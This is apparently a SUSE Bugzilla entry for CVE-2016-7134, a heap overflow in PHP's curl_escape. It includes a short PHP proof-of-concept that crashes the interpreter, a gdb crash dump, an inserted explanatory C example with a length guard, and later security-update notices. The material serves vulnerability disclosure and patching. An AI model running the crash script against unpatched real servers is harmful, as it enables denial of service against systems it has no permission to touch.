Bugzilla – Bug 997248
VUL-0: CVE-2016-7134: php5, php7: Heap overflow in the function curl_escape
Last modified: 2017-09-20 06:37:14 UTC
Description:
------------
I have found a code block that leads to a heap overflow. As you can see at:

```c
PHP_FUNCTION(curl_escape)
{
	char *str = NULL, *res = NULL;
	size_t str_len = 0;
	zval *zid;
	php_curl *ch;

	*** SNIP ***

	if ((res = curl_easy_escape(ch->cp, str, str_len))) {
		RETVAL_STRING(res);
		curl_free(res);
	} else {
		RETURN_FALSE;
	}

	*** SNIP ***
}
```

I did some analysis of curl_easy_escape in libcurl and here is the source code:

```c
char *curl_easy_escape(CURL *handle, const char *string, int inlength)
{
  size_t alloc = (inlength?(size_t)inlength:strlen(string))+1;
  char *ns;
  char *testing_ptr = NULL;

  *** SNIP ***

  ns = malloc(alloc);
  if(!ns)
    return NULL;

  length = alloc-1;
  while(length--) {
    in = *string;

    if (Curl_isalnum(in)) {
      /* just copy this */
      ns[strindex++]=in;

  *** SNIP ***
```

Here you see that alloc is calculated by adding inlength and one. If we pass a string with length 0xfffffff to curl_escape, alloc adds 1 to it and the result of alloc is 0. After that, malloc allocates a buffer with size 0 and length = 0 - 1 = -1 = 0xfffffff, which leads to a heap overflow.

Test script:
---------------

```php
<?php
ini_set('memory_limit',-1);
$ch = curl_init('http://google.com');
curl_escape($ch,str_repeat("A",0xffffffff));
?>
```

Actual result:
--------------

```
Program received signal SIGSEGV, Segmentation fault.
[----------------------------------registers-----------------------------------]
RAX: 0x7ffff67ce508 (<curl_easy_escape+120>:	mov    BYTE PTR [r14+r13*1],cl)
RBX: 0x0
RCX: 0x41 ('A')
RDX: 0x14
RSI: 0x7ffff67a2b20 --> 0x100000000
RDI: 0x0
RBP: 0x7ffff67ff8ec --> 0xfffcec1cfffcec1c
RSP: 0x7fffffffa720 --> 0x148fd80 ('A' <repeats 200 times>...)
RIP: 0x7ffff67ce508 (<curl_easy_escape+120>:	mov    BYTE PTR [r14+r13*1],cl)
R8 : 0x7fffffffa5b8 --> 0x0
R9 : 0x7fffffffa5b4 --> 0x0
R10: 0x14773e0 --> 0x79746974 ('tity')
R11: 0x7ffff67ce490 (<curl_easy_escape>:	push   r15)
R12: 0x0
R13: 0x38c10
R14: 0x14773f0 ('A' <repeats 200 times>...)
R15: 0x7ffeef038c28 ('A' <repeats 200 times>...)
EFLAGS: 0x10213 (CARRY parity ADJUST zero sign trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
   0x7ffff67ce4fc <curl_easy_escape+108>:	add    rax,rbp
   0x7ffff67ce4ff <curl_easy_escape+111>:	jmp    rax
   0x7ffff67ce501 <curl_easy_escape+113>:	nop    DWORD PTR [rax+0x0]
=> 0x7ffff67ce508 <curl_easy_escape+120>:	mov    BYTE PTR [r14+r13*1],cl
   0x7ffff67ce50c <curl_easy_escape+124>:	add    r13,0x1
   0x7ffff67ce510 <curl_easy_escape+128>:	mov    rax,QWORD PTR [rsp+0x10]
   0x7ffff67ce515 <curl_easy_escape+133>:	add    r15,0x1
   0x7ffff67ce519 <curl_easy_escape+137>:	sub    rax,r15
[------------------------------------stack-------------------------------------]
0000| 0x7fffffffa720 --> 0x148fd80 ('A' <repeats 200 times>...)
0008| 0x7fffffffa728 --> 0x7ffeef000018 ('A' <repeats 200 times>...)
0016| 0x7fffffffa730 --> 0xffffffffffffffff
0024| 0x7fffffffa738 --> 0x7ffeef000018 ('A' <repeats 200 times>...)
0032| 0x7fffffffa740 --> 0x148fd80 ('A' <repeats 200 times>...)
0040| 0x7fffffffa748 --> 0x0
0048| 0x7fffffffa750 --> 0x7fffffffa7e0 --> 0x7fffffffa810 --> 0x7fffffffa840 --> 0x7fffffffa880 --> 0x7fffffffa990 --> 0x7fffffffcc90 --> 0x7fffffffe010 --> 0x7fffffffe160 --> 0xa28260 (<__libc_csu_init>:	push   r15)
0056| 0x7fffffffa758 --> 0x42cb20 (<_start>:	xor    ebp,ebp)
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
Stopped reason: SIGSEGV
0x00007ffff67ce508 in curl_easy_escape () from /usr/lib/x86_64-linux-gnu/libcurl.so.4
gdb-peda$ bt
#0  0x00007ffff67ce508 in curl_easy_escape () from /usr/lib/x86_64-linux-gnu/libcurl.so.4
#1  0x00000000005ff72c in zif_curl_escape (execute_data=0x7fffef614110, return_value=0x7fffef614100) at /home/hoangnguyen/Data/Build/audit/php-7.0.7/ext/curl/interface.c:3571
```

References:
https://bugs.php.net/bug.php?id=72674
https://github.com/php/php-src/commit/72dbb7f416160f490c4e9987040989a10ad431c7?w=1
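The root cause in the report is a size_t length narrowed to libcurl's `int inlength` and then widened back and incremented, so that the allocation size wraps to 0 while the loop bound wraps to SIZE_MAX (visible as 0xffffffffffffffff on the stack dump above). The following is an added example, not code from the bug report, from PHP or from libcurl; it models only that arithmetic and shows the kind of length check a caller needs before handing a size_t length to an int-taking API. All function names here are hypothetical, and the strlen() branch libcurl takes for inlength == 0 is intentionally left out.

```c
/* Added example (not code from the bug report, PHP or libcurl): models the
 * size arithmetic the report describes and the length check that stops it.
 * Function names are hypothetical. */
#include <limits.h>
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

/* Mirror of what happens when a size_t str_len is passed to a routine taking
 * `int inlength`, which then computes alloc = (size_t)inlength + 1.
 * The strlen() branch for inlength == 0 is omitted (not the reported path). */
size_t escape_alloc_size(size_t str_len)
{
    int inlength = (int)str_len;          /* narrowing at the call site      */
    size_t alloc = (size_t)inlength + 1;  /* widening plus one, as in libcurl */
    return alloc;
}

/* Loop bound derived from alloc: when alloc wrapped to 0 this underflows to
 * SIZE_MAX, so a copy loop bounded by it never stops at the buffer's end. */
size_t escape_loop_count(size_t alloc)
{
    return alloc - 1;
}

/* Guard: a length survives the size_t -> int narrowing only if it fits in a
 * non-negative int. Larger values turn negative on two's-complement targets
 * (0xffffffff becomes -1, the case in the report). */
bool escape_len_is_safe(size_t str_len)
{
    return str_len <= (size_t)INT_MAX;
}

/* Hardened caller: refuses the call (the caller's RETURN_FALSE path) instead
 * of passing an unrepresentable length on. Fills *alloc_out only on success. */
bool checked_escape_alloc(size_t str_len, size_t *alloc_out)
{
    if (!escape_len_is_safe(str_len))
        return false;
    *alloc_out = escape_alloc_size(str_len);
    return true;
}

int main(void)
{
    /* Constructed inputs: an ordinary length and the length from the test script. */
    size_t inputs[] = { 5, (size_t)0xffffffffULL };
    for (size_t i = 0; i < sizeof inputs / sizeof inputs[0]; i++) {
        size_t alloc = escape_alloc_size(inputs[i]);
        size_t out = 0;
        bool ok = checked_escape_alloc(inputs[i], &out);
        printf("str_len=%zu -> alloc=%zu, loop count=%zu, accepted=%s\n",
               inputs[i], alloc, escape_loop_count(alloc), ok ? "yes" : "no");
    }
    return 0;
}
```

Running it prints alloc=0 and a loop count of SIZE_MAX for the 0xffffffff input, which is exactly the state the register dump shows; the guarded wrapper rejects that input before any allocation happens, while the 5-byte input is accepted with alloc=6.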
bugbot adjusting priority
Packages submitted.
This is an autogenerated message for OBS integration: This bug (997248) was mentioned in https://build.opensuse.org/request/show/425708 13.2 / php5
openSUSE-SU-2016:2337-1: An update that fixes 10 vulnerabilities is now available.

Category: security (important)
Bug References: 997206,997207,997208,997210,997211,997220,997225,997230,997248,997257
CVE References: CVE-2016-7124,CVE-2016-7125,CVE-2016-7126,CVE-2016-7127,CVE-2016-7128,CVE-2016-7129,CVE-2016-7130,CVE-2016-7131,CVE-2016-7132,CVE-2016-7134
Sources used:
openSUSE 13.2 (src): php5-5.6.1-75.2
SUSE-SU-2016:2408-1: An update that fixes 24 vulnerabilities is now available.

Category: security (important)
Bug References: 987530,987580,988032,991422,991424,991426,991427,991428,991429,991430,991433,991434,991437,997206,997207,997208,997210,997211,997220,997225,997230,997248,997257
CVE References: CVE-2014-3587,CVE-2016-3587,CVE-2016-5399,CVE-2016-6128,CVE-2016-6161,CVE-2016-6207,CVE-2016-6288,CVE-2016-6289,CVE-2016-6290,CVE-2016-6291,CVE-2016-6292,CVE-2016-6295,CVE-2016-6296,CVE-2016-6297,CVE-2016-7124,CVE-2016-7125,CVE-2016-7126,CVE-2016-7127,CVE-2016-7128,CVE-2016-7129,CVE-2016-7130,CVE-2016-7131,CVE-2016-7132,CVE-2016-7134
Sources used:
SUSE Linux Enterprise Software Development Kit 12-SP1 (src): php5-5.5.14-73.1
SUSE Linux Enterprise Module for Web Scripting 12 (src): php5-5.5.14-73.1
openSUSE-SU-2016:2451-1: An update that fixes 24 vulnerabilities is now available.

Category: security (important)
Bug References: 987530,987580,988032,991422,991424,991426,991427,991428,991429,991430,991433,991434,991437,997206,997207,997208,997210,997211,997220,997225,997230,997248,997257
CVE References: CVE-2014-3587,CVE-2016-3587,CVE-2016-5399,CVE-2016-6128,CVE-2016-6161,CVE-2016-6207,CVE-2016-6288,CVE-2016-6289,CVE-2016-6290,CVE-2016-6291,CVE-2016-6292,CVE-2016-6295,CVE-2016-6296,CVE-2016-6297,CVE-2016-7124,CVE-2016-7125,CVE-2016-7126,CVE-2016-7127,CVE-2016-7128,CVE-2016-7129,CVE-2016-7130,CVE-2016-7131,CVE-2016-7132,CVE-2016-7134
Sources used:
openSUSE Leap 42.1 (src): php5-5.5.14-59.1
done
SUSE-SU-2016:2460-1: An update that solves 29 vulnerabilities and has two fixes is now available.

Category: security (important)
Bug References: 1001950,987580,988032,991422,991424,991426,991427,991428,991429,991430,991434,991437,995512,997206,997207,997208,997210,997211,997220,997225,997230,997247,997248,997257,999313,999679,999680,999684,999685,999819,999820
CVE References: CVE-2016-4473,CVE-2016-5399,CVE-2016-6128,CVE-2016-6161,CVE-2016-6207,CVE-2016-6289,CVE-2016-6290,CVE-2016-6291,CVE-2016-6292,CVE-2016-6295,CVE-2016-6296,CVE-2016-6297,CVE-2016-7124,CVE-2016-7125,CVE-2016-7126,CVE-2016-7127,CVE-2016-7128,CVE-2016-7129,CVE-2016-7130,CVE-2016-7131,CVE-2016-7132,CVE-2016-7133,CVE-2016-7134,CVE-2016-7412,CVE-2016-7413,CVE-2016-7414,CVE-2016-7416,CVE-2016-7417,CVE-2016-7418
Sources used:
SUSE Linux Enterprise Software Development Kit 12-SP1 (src): php7-7.0.7-15.1
SUSE Linux Enterprise Module for Web Scripting 12 (src): php7-7.0.7-15.1
SUSE-SU-2016:2460-2: An update that solves 29 vulnerabilities and has two fixes is now available.

Category: security (important)
Bug References: 1001950,987580,988032,991422,991424,991426,991427,991428,991429,991430,991434,991437,995512,997206,997207,997208,997210,997211,997220,997225,997230,997247,997248,997257,999313,999679,999680,999684,999685,999819,999820
CVE References: CVE-2016-4473,CVE-2016-5399,CVE-2016-6128,CVE-2016-6161,CVE-2016-6207,CVE-2016-6289,CVE-2016-6290,CVE-2016-6291,CVE-2016-6292,CVE-2016-6295,CVE-2016-6296,CVE-2016-6297,CVE-2016-7124,CVE-2016-7125,CVE-2016-7126,CVE-2016-7127,CVE-2016-7128,CVE-2016-7129,CVE-2016-7130,CVE-2016-7131,CVE-2016-7132,CVE-2016-7133,CVE-2016-7134,CVE-2016-7412,CVE-2016-7413,CVE-2016-7414,CVE-2016-7416,CVE-2016-7417,CVE-2016-7418
Sources used:
SUSE Linux Enterprise Module for Web Scripting 12 (src): php7-7.0.7-15.1
An update workflow for this issue was started. This issue was rated as moderate. Please submit fixed packages until 2017-02-13. When done, reassign the bug to security-team@suse.de. https://swamp.suse.de/webswamp/wf/63367